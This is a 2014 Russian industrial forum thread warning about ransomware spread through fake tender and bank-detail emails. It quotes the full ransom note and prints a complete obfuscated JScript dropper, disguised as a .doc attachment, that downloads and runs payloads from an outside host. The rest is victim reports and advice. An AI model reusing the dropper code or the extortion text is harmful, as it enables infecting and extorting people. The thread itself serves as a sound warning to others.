Часовой пояс: UTC + 3 часа [ Летнее время ]




Начать новую тему Ответить на тему
 Страница 1 из 2  [ Сообщений: 57 ]  На страницу 1, 2  След.
Автор Сообщение
 Заголовок сообщения: Внимание вирус!
Непрочитанное сообщениеДобавлено: 14 июн 2014, 12:56 
Не в сети

Зарегистрирован: 14 июн 2014, 12:24
Сообщения: 2
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
ВНИМАНИЕ!!! С "Чайковский Завод Метизов" с адреса chzm@mail.ru приходит зараженный файл,,Тендерное предложение от "ЧЗМ" 8 который блокирует и повреждает все файлы на компьютере. Интересно кто у них там балуется? Убирают конкурентов? Зарабатывает деньги? Или на этом емайле кто то чужой? Потом появляется письмо что разблокирую после оплаты. РАЗОБРАЛИСЬ БЫ ГОСПОДА !

Файл с этим письмом блокируется на этом сайте, поэтому пишу так;



Все файлы были ВРЕМЕННО ЗАБЛОКИРОВАНЫ с помощью алгоритма RSA-1024

1. Это инструкция. У Вас есть проблема - зашифрованые файлы. Её решить возможно, не переживайте.

2. Для решения данной проблемы нужно объединить наши ресурсы.
Ваши ресурсы:
- e-mail и доверие
- электронная валюта, за урок.
Наши ресурсы:
- Возможность разблокировать Ваш ключ (дешифровщик уже у Вас есть - DECRYPT.exe)
- Гарантии
- Консультации

3. Мы не из тех, кто шифруют данные, получают средства и затем пропадают.
В данном случае Вы и вправду имеете 100% возможность разблокировать файлы.
Только есть небольшое временное ограничение (срок годности ключа не вечный)
Откладывать вопрос "на потом" также не вариант, верить в чудеса не стоит.

4. У Вас есть два варианта:
а) Форматировать диск и вернуть 0% файлов - неразумно
б) Заплатить за свою невнимательность, вернуть 100% файлов и получить консультации - вполне правильно

5. Попробуйте запустите Ваш дешифратор из архива. Вам напишет, что ключ не найден. Вот он Вам и нужен.

6. Тех.справка:
Ваш случай - ассиметричное шифрование RSA-1024, используется в военной сфере. Взломать невозможно.
При шифровании в разные места компьютера был скопирован специальный ID-файл 'KEY.PRIVATE'. Не потеряйте его (!)
Для каждого компьютера ID-файл создается новый. Он уникальный и в нём содержится код на дешифровку. Он нам и нужен
Вы можете обращаться к своим сис.админам, в антивирусные лаборатории. Они Вам ничем, к сожалению, не помогут.

7. Итак, Наши следующие шаги:
7.1. Получаете ГАРАНТИЮ того, что мы МОЖЕМ расшифровать файлы
7.2. Структура Вашего письма:
- вложение Вашего ID-файла 'KEY.PRIVATE' (!!!) - поищите его на компьютере, без него восстановление невозможно
- 1-2 зашифрованных файла для проверки возможности расшифровки
- приблизительное колл-во зашифрованных файлов / компьютеров
### Все это отправляете на ту почту, как были помечены файлы (например: unstyx@gmail.com или unblck@gmail.com) ###

7.3. В течение 1-го часа Вы получите гарантию и стоимость на Ваш ключ
7.4. Далее производится оплата, стоимость от 120 евро.
7.5. Мы отправляем Вам ключ, Вы его кладете в одну папку с дешифратором (DECRYPT.exe) и запускаете дешифратор
7.6. При запуске дешифратора производится скрытая дешифровка данных. Процесс запускать более 1-го раза нельзя.
7.7. Процесс дешифрования может занимать до 6-ти часов. По окончании процесса компьютер перезагрузится.

9. Советы:
9.1. После приобретения ключа, сделайте копию всех важных зашифрованных файлов на внешние носители.
9.2. В процессе дешифрования желательно не трогать компьютер, (!) ДВА раза запускать с ключем дешифратор не нужно.
9.3. Если думаете, что вместо дешифратора Вы получите очередной вирус, тогда поставьте вирт.систему и там проведите декрипт.
9.2. Если какие-то файлы не будут окончательно расшифрованы, мы дорасшифруем вручную
9.3. Как защититься от этого? -Копируйте раз в неделю все на внешние носители и не открывайте подозрительных файлов
WRITE: unblck@gmail.com
CRYPTED DATE: 13.06.2014 / 11:18


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 16 июн 2014, 07:24 
Не в сети

Зарегистрирован: 02 окт 2013, 11:17
Сообщения: 229
Откуда: Пенза
Благодарил (а): 7 раз.
Поблагодарили: 5 раз.
Заслуженная репутация: 1
 Ответить с цитатой Ответить на тему 
Написали конечно они грамотно, дабы сомнений заплатить им не осталось. В шифт думаю верить не стоит, бред все это.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 17 июн 2014, 07:46 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
Подтверждаю, есть такая зараза!

Сегодня пришло письмо:

От кого: ООО ПКФ ТехКомБест <oootcb@mail.ru>
Дата: 13 июня 2014 г., 13:37
Тема: Смена реквизитов (2)
Кому: неважно...


Доброго времени суток ув. коллеги!
Обратите внимание на смену наших реквизитов в перечне документации. (см. вложение)


---
С уважением, ООО ПКФ "ТехКомБест".
Республика Башкортостан, г. Стерлитамак
тел. 8(3473) 21-46-61; 21-43-99
Тел,факс: 8 (980) 21-44-84
8-351-79-69-014

Во вложении zip архив с одним js файлом (перечень документации ООО ПКФ ТехКомБест смена банковских реквизитов www.tehkombest.ru (копия - 2) 13.06.2014 _ mail-attachment_DrWеь.KaspеrskуScanned.ОK.dос.js) следующего содержания:

function CreateObject(a){return new ActiveXObject(a)}function DWNDCRYPTO(a,b){b=WshShell.ExpandEnvironmentStrings(b);var c=WScript.CreateObject(_0xa095[3]);c[_0xa095[5]](_0xa095[4],a,!1);c[_0xa095[6]](null);var d=CreateObject(_0xa095[7]+_0xa095[8]);with(d)return Mode=3,Type=1,Open(),Write(c[_0xa095[9]]),SaveToFile(b,1),Close(),b}function Run(a){WshShell.Run(a,0,0)}
var _0xa095='%TEMP%\\ WScript.Shell Scripting.FileSystemObject Msxml2.XMLhttp GET open send ADO DB.Stream responseBody http://unstyx.tw1.ru/document %TEMP%\\document.doc " document.doc" http://unstyx.tw1.ru/cde %TEMP%\\cde.cmd http://unstyx.tw1.ru/svchost %TEMP%\\svchost.cry http://unstyx.tw1.ru/iconv %TEMP%\\iconv.dll http://unstyx.tw1.ru/genkey %TEMP%\\genkey.cry http://unstyx.tw1.ru/secrypt %TEMP%\\secrypt.cry http://unstyx.tw1.ru/uncrypt %TEMP%\\uncrypt.cry http://unstyx.tw1.ru/idblck %TEMP%\\idblck.bin cde.cmd" http://unstyx.tw1.ru/DECRYPT %TEMP%\\DECRYPT.zip http://unstyx.tw1.ru/javav %TEMP%\\javav.cry http://unstyx.tw1.ru/input1 %TEMP%\\input1.cry http://unstyx.tw1.ru/input2 %TEMP%\\input2.cry'.split(" "),DestinationFLE=
_0xa095[0],WshShell=CreateObject(_0xa095[1]),FSO=fso=CreateObject(_0xa095[2]);DWNDCRYPTO(_0xa095[10],_0xa095[11]);try{Run(_0xa095[12]+DestinationFLE+_0xa095[13])}catch(e$$14){}DWNDCRYPTO(_0xa095[14],_0xa095[15]);DWNDCRYPTO(_0xa095[16],_0xa095[17]);DWNDCRYPTO(_0xa095[18],_0xa095[19]);DWNDCRYPTO(_0xa095[20],_0xa095[21]);DWNDCRYPTO(_0xa095[22],_0xa095[23]);DWNDCRYPTO(_0xa095[24],_0xa095[25]);DWNDCRYPTO(_0xa095[26],_0xa095[27]);Run(_0xa095[12]+DestinationFLE+_0xa095[28]);DWNDCRYPTO(_0xa095[29],_0xa095[30]);
DWNDCRYPTO(_0xa095[31],_0xa095[32]);DWNDCRYPTO(_0xa095[33],_0xa095[34]);DWNDCRYPTO(_0xa095[35],_0xa095[36]);

Это уже второй раз, в первый раз пришло письмо с "тендерной заявкой", тоже типа из Башкирии.


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 17 июн 2014, 16:28 
Аватара пользователя
E-mail: gromovavomts@gmail.com
 Ответить с цитатой Ответить на тему 
ЭТО unblck@gmail.com И ЕСТЬ ВЫМОГАТЕЛИ.
Нагло требуют денег, а будут ли после оплаты функционировать компы или нет неизвестно!


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 17 июн 2014, 18:22 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
812Александр812 писал(а):

ЭТО unblck@gmail.com И ЕСТЬ ВЫМОГАТЕЛИ.
Нагло требуют денег, а будут ли после оплаты функционировать компы или нет неизвестно!



Ясное дело что они вымогатели. Но действуют через с электронок компаний. А получая их почту уже будешь думать стоит ли смотреть. Так от любой заявки будешь шарахаться.. sm_56 sm_56 sm_56


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 17 июн 2014, 19:06 
Не в сети

Зарегистрирован: 01 фев 2014, 09:53
Сообщения: 25
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Мне в комп эта зараза попала, даже не понял, как. Теперь приходится все повреждённые файлы восстанавливать...
Найти бы их и наказать...


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 18 июн 2014, 07:21 
Аватара пользователя
E-mail: savelyev-pasha@ya.ru
 Ответить с цитатой Ответить на тему 
Пишу сюда, потому что тема обсуждается только здесь. Знакомый позвал помочь с проблемой на его предприятии. 16 июня им пришло письмо от этого же завода, они запустили файл из вложения, и все файлы соответственно зашифровались. Я скопировал его себе на флешку с целью запустить на виртуальной машине, чтобы узнать, какие настройки моего антивируса смогут предотвратить заражение. На виртуальной машине этот вирус мне не удалось заставить работать даже совсем без антивируса. Его деятельность прекращается с ошибкой Adodb.Stream Невозможно записать файл 800A0BBC. Файлы с требованиями и прочие не копируются, шифрование не происходит. Возможно, это связано с недоступностью ресурса, к которому обращается зловред http://unstyx.tw1.ru. Он меня посылает с 403-й ошибкой. Заражения этим вирусом все еще происходят или злоумышленники поменяли адрес или их прикрыли? Или я что-то делаю неправильно?


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 18 июн 2014, 08:06 
Не в сети

Зарегистрирован: 01 фев 2014, 09:53
Сообщения: 25
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Я сначала переименовываю файлы (возвращаю прежнее название), потом восстанавливаю предыдущую версию (перед этим вернулся к предыдущей точке восстановления) . Может быть есть более простой способ ?


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 18 июн 2014, 10:35 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
тоже имела неосторожность открыть архивный файл
От кого: ООО ПКФ ТехКомБест <oootcb@mail.ru>

как расшифровать файлы, подскажите


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 18 июн 2014, 11:56 
Не в сети

Зарегистрирован: 01 фев 2014, 09:53
Сообщения: 25
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Попробуйте по выше описанной схеме.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 18 июн 2014, 15:21 
Аватара пользователя
E-mail: oachernyshev@gmail.com
 Ответить с цитатой Ответить на тему 
Нам также пришло письмо вирусом. Кто-нибудь обращался непосредственно к отправителю "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ", предоставляют ли они информацию о масштабах рассылки вируса, мерах по предотвращению подобных ситуаций?


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 22 июн 2014, 22:49 
Аватара пользователя
E-mail: oachernyshev@gmail.com
 Ответить с цитатой Ответить на тему 
Может кому пригодится - предлагается вариант самостоятельного исправления
http://yarportal.ru/topic623549s0.html


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 25 июн 2014, 16:40 
Не в сети

Зарегистрирован: 01 фев 2014, 09:53
Сообщения: 25
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Внимание!
Из Казахстана идут рассылки с вирусом в архивированных файлах!


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 25 июн 2014, 18:41 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
sm_68 sm_68 sm_68 Ну это прямо вредительство сплошное.! Впору компетентные органы подключать чтобы вычислить этого гада.


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 26 июн 2014, 08:14 
Не в сети
Аватара пользователя

Зарегистрирован: 29 янв 2010, 12:35
Сообщения: 3026
Откуда: Челябинск
Благодарил (а): 9 раз.
Поблагодарили: 1001 раз.
Заслуженная репутация: 20
Общепризнанный Арматурщик
 Ответить с цитатой Ответить на тему 
свои
Давно пора!

_________________
Производство фланцев ГОСТ, ANSI, DIN.
Шаровые краны от Ду 10 до Ду 250. Ру 63 max. (цельносварные, разборные, трехходовые...)
Клапана обратные от Ду 50 до Ду 300 Ру 160 max.
http://нпа74.рф/
http://stroymaks-ural.ru/


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 26 июн 2014, 08:24 
Не в сети

Зарегистрирован: 07 апр 2011, 11:02
Сообщения: 410
Откуда: Пермь
Благодарил (а): 4 раз.
Поблагодарили: 79 раз.
Заслуженная репутация: 7
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
Че за хрень? Поставьте антивирусник лицензионный или мозги своему системному администратору выносите. Нахрена нам на арматурном форуме эта бредятина? sm_45 sm_45 sm_45

_________________
Хочу качественно, быстро и без денег


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 26 июн 2014, 10:28 
Не в сети

Зарегистрирован: 01 фев 2014, 09:53
Сообщения: 25
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
А по-моему, предупредить коллег о письмах, в которых находятся якобы заявки или "новые реквизиты" в архивированных файлах с вирусом, совершенно не "хрень".
Системные администраторы есть далеко не во всех компаниях.
А антивирусные программы не во всех случаях помогут.
Если пользователь захочет открыть файл с "заявкой", он его откроет. -(
Другое дело, что тему для форума надо назвать типа: "Внимание, вирус!".


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 июн 2014, 10:42 
Не в сети
Аватара пользователя

Зарегистрирован: 29 янв 2010, 12:35
Сообщения: 3026
Откуда: Челябинск
Благодарил (а): 9 раз.
Поблагодарили: 1001 раз.
Заслуженная репутация: 20
Общепризнанный Арматурщик
 Ответить с цитатой Ответить на тему 
klapan
Согласен.

_________________
Производство фланцев ГОСТ, ANSI, DIN.
Шаровые краны от Ду 10 до Ду 250. Ру 63 max. (цельносварные, разборные, трехходовые...)
Клапана обратные от Ду 50 до Ду 300 Ру 160 max.
http://нпа74.рф/
http://stroymaks-ural.ru/


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 июн 2014, 11:05 
Не в сети
Аватара пользователя

Зарегистрирован: 10 май 2011, 08:07
Сообщения: 156
Благодарил (а): 73 раз.
Поблагодарили: 55 раз.
Заслуженная репутация: 1
 Ответить с цитатой Ответить на тему 
Вот собаки.Спасибо за предупреждение,буду предельно аккуратен с письмами.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 июн 2014, 11:43 
Не в сети
Аватара пользователя

Зарегистрирован: 12 окт 2011, 08:13
Сообщения: 516
Откуда: Барнео
Благодарил (а): 3 раз.
Поблагодарили: 199 раз.
Заслуженная репутация: 6
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
Вставлю свои 5 копеек.

Мне приходило письмо якобы от судебных приставов. Типа "в этом году с моей контору будут жестоко дрючить. Более подробно ознакомьтесь с постановлением с файле." А там архив. Открываю. файл: Постановление бла-бла-бла.exe Вот мне-то сразу понятно, что это исполнительный файл, а значит вирусня. А если кто-то не знает? Ну пох, у меня кашмарский стоит, открываю. Он рычит: троян говорит тута. Удалил его и всё.

Кому это нах нужно???

З.Ы. Кашмарский интернет секьюрити на 5 машин брал за 2 рубля или даже дешевле.

_________________
Изготовление промышленного котельного и вспомогательного оборудования.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 июн 2014, 14:09 
Не в сети

Зарегистрирован: 01 фев 2014, 09:53
Сообщения: 25
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Вот ещё пришло письмо с вложенным архивированным файлом:
info@drweb.com
"За последние месяцы значительно увеличилось количество обращений от пользователей, пострадавших от вирусов-шифровальщиков.

Аналитический центр Dr.Web установил, что рассылка вирусов осуществлялась и на Ваш электронный адрес.

Мы подготовили простую инструкцию (во вложении), выполнение которой обезопасит Вас от многих уязвимостей.

С Уважением,
Dr.Web."

Возможно тоже с вирусом.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 26 июн 2014, 14:34 
Не в сети
Аватара пользователя

Зарегистрирован: 28 авг 2009, 18:13
Сообщения: 1257
Откуда: Омск - синоним слова "спорт"
Благодарил (а): 8 раз.
Поблагодарили: 348 раз.
Заслуженная репутация: 18
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
Вчера вечером при входе в эту ветку антивирус на моём компе сильно матерился и не давал открыть страницу. Пришлось звонить Админу. Получается, кто-то из наших вчера внёс сюда какое-то вложение с трояном ?

_________________
"Российское государство ведёт себя, как цыганское племя, которому легче переехать на новую территорию, чем привести в порядок свою..." Василий Ключевский (1841-1911)


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: "ЧАЙКОВСКИЙ ЗАВОД МЕТИЗОВ"
Непрочитанное сообщениеДобавлено: 26 июн 2014, 15:25 
Не в сети

Зарегистрирован: 14 июн 2014, 12:24
Сообщения: 2
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
klapan писал(а):

А по-моему, предупредить коллег о письмах, в которых находятся якобы заявки или "новые реквизиты" в архивированных файлах с вирусом, совершенно не "хрень".
Системные администраторы есть далеко не во всех компаниях.
А антивирусные программы не во всех случаях помогут.
Если пользователь захочет открыть файл с "заявкой", он его откроет. -(
Другое дело, что тему для форума надо назвать типа: "Внимание, вирус!".


sm_111 Ну да. Это правильно что тему нужно было назвать по другому. Просто я так ошалела, первый раз такое, да еще от имени компании. Думаю надо как то предупредить, кто знает поможет ли антивирус. Мне например не помог. Дома работала за своим ноутбуком. Я хоть и быстро схватилась, все же файлы успели заблокировать. Благо что у меня ничего такого ценного не было. Блокнот, и то что было скачано с интернета сумела разблокировать. Больше морочатся не стала, и удалила все к чертям. Прогнала все через антивирусники, вроде бы все нормально, нигде не глючит, ничего не цепляет. Все работает в обычном режиме. А если бы я открыла файл на рабочем месте!? Кто знает, как вышло бы. Не хотела бы что бы вся работа пошла на смарку. Я теперь прежде чем открыть файл проверяю его на вирус. Лутчше перебдить чем не добдить. А название здесь самим не исправить, думала об этом. Спасибо админу !!!


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 27 июн 2014, 07:14 
Не в сети
Аватара пользователя

Зарегистрирован: 12 окт 2011, 08:13
Сообщения: 516
Откуда: Барнео
Благодарил (а): 3 раз.
Поблагодарили: 199 раз.
Заслуженная репутация: 6
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
klapan писал(а):

Вот ещё пришло письмо с вложенным архивированным файлом:
info@drweb.com
"За последние месяцы значительно увеличилось количество обращений от пользователей, пострадавших от вирусов-шифровальщиков.

Аналитический центр Dr.Web установил, что рассылка вирусов осуществлялась и на Ваш электронный адрес.

Мы подготовили простую инструкцию (во вложении), выполнение которой обезопасит Вас от многих уязвимостей.

С Уважением,
Dr.Web."

Возможно тоже с вирусом.

Вот, почитай http://news.drweb.com/show/?i=5820&c=23

_________________
Изготовление промышленного котельного и вспомогательного оборудования.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 27 июн 2014, 08:14 
Не в сети

Зарегистрирован: 16 ноя 2011, 20:48
Сообщения: 215
Откуда: местный
Благодарил (а): 2 раз.
Поблагодарили: 123 раз.
Заслуженная репутация: 8
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
Позавчера пришла какая-то херня про задолжность моего предприятия,которого ни когда не было.Пробил эл-ку,ноль и удалил.Вчера пришел докторишка.У нас завелся членовредитель :wink:

_________________
СНИМАЕТ СТРЕСС-ДЕНЕЖНЫЙ ПРЕСС

Наши матрёшки made in China
В наших кувшинах нету джина.

Будь хоть красавцем,будь хоть уродом.
Жизнь удалась,если накормлен бутербродом.(R)


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 27 июн 2014, 09:37 
Аватара пользователя
E-mail: arm-t@list.ru
Организация: ООО
 Ответить с цитатой Ответить на тему 
Требо -Каспера подключать-Факт!!!!!!


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 27 июн 2014, 10:30 
Не в сети

Зарегистрирован: 04 дек 2012, 12:31
Сообщения: 443
Откуда: Тула
Благодарил (а): 4 раз.
Поблагодарили: 21 раз.
Заслуженная репутация: 9
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
Если не хочется разоряться на лицензию от каспера, то можно скачать пробник тут.

У кого ничего не стоит рекомендую к применению, а то мне кажется что помимо заражения файлы ещё и переправляются куда...

_________________
Да... На Руси, слава Богу... дураков лет на 100 припасено...
Внимание вирус! - Изображение
Внимание вирус! - Изображение


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 02 июл 2014, 17:56 
Не в сети
Аватара пользователя

Зарегистрирован: 07 авг 2013, 14:35
Сообщения: 395
Откуда: Новосибирск
Благодарил (а): 9 раз.
Поблагодарили: 10 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
спасибо за предупреждение, буду осторожен. а наличие антивируса на компе (даже лицензии каспера), не означает отсутствие на этом компе вирусов!!! sm_130


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 03 июл 2014, 13:51 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
Это не вирус, это вредоносный скрипт, связи с чем антивирусы его не определят.


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 03 июл 2014, 13:53 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
Мы заплатили, но мошенники нам файлы не восстановили. Всё делали по их инструкции.


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 03 июл 2014, 15:32 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
812Александр812 , сколько просили ?


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 04 июл 2014, 13:54 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
6500 рублей.


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 05 июл 2014, 17:30 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
Добро пожаловать в 21 век


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 05 авг 2014, 15:52 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
Внимание !!! С "Завод испытательного оборудования" приходят информационные письма и реклама с трояном !


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 05 авг 2014, 15:54 
Аватара пользователя
 Ответить с цитатой Ответить на тему 
Забыл добавить "Завод испытательного оборудования" г. Москва. Друзья! Вы уж проверте почему от вас "троян" идет?!


Вернуться к началу
  Ответить с цитатой Ответить на тему   
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 11 авг 2014, 07:44 
Не в сети
Аватара пользователя

Зарегистрирован: 18 фев 2014, 09:32
Сообщения: 26
Откуда: Нижний Новгород
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Мля... и у меня выявилась хрень unblck@gmail_com
50% фото на компе зашифровалось...(((
К кому посоветуете обратиться с лечением?...
Заранее благодарен...

_________________
Производство деталей трубопроводов высокого давления Ру до 100МПа по ГОСТ Р55599-2013 ( ГОСТ 22790-83 )


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 11 авг 2014, 10:38 
Не в сети

Зарегистрирован: 07 апр 2011, 12:45
Сообщения: 332
Благодарил (а): 10 раз.
Поблагодарили: 119 раз.
Заслуженная репутация: 2
 Ответить с цитатой Ответить на тему 
глеб

да никуда! Удалять и все! :(


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 11 авг 2014, 10:41 
Не в сети
Аватара пользователя

Зарегистрирован: 18 фев 2014, 09:32
Сообщения: 26
Откуда: Нижний Новгород
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Вот это ж**а...((( За Я*ЦА бы подвесил гребаных хакеров.................

_________________
Производство деталей трубопроводов высокого давления Ру до 100МПа по ГОСТ Р55599-2013 ( ГОСТ 22790-83 )


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 12 авг 2014, 08:23 
Не в сети
Аватара пользователя

Зарегистрирован: 12 окт 2011, 08:13
Сообщения: 516
Откуда: Барнео
Благодарил (а): 3 раз.
Поблагодарили: 199 раз.
Заслуженная репутация: 6
Бравый Арматурщик
 Ответить с цитатой Ответить на тему 
глеб
У товарища такая же херня случилась. Только у него ВСЕ фотки по пiзде пошли...
А сделать ничего нельзя. Скрипт ебнврт.

_________________
Изготовление промышленного котельного и вспомогательного оборудования.


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
Непрочитанное сообщениеДобавлено: 12 авг 2014, 09:07 
Не в сети
Аватара пользователя

Зарегистрирован: 18 фев 2014, 09:32
Сообщения: 26
Откуда: Нижний Новгород
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Заслуженная репутация: 0
 Ответить с цитатой Ответить на тему 
Хреново.....((((((((((((((

_________________
Производство деталей трубопроводов высокого давления Ру до 100МПа по ГОСТ Р55599-2013 ( ГОСТ 22790-83 )


Вернуться к началу
  Ответить с цитатой Ответить на тему  Профиль   Рейтинг: 0  
 Заголовок сообщения: Re: Внимание вирус!
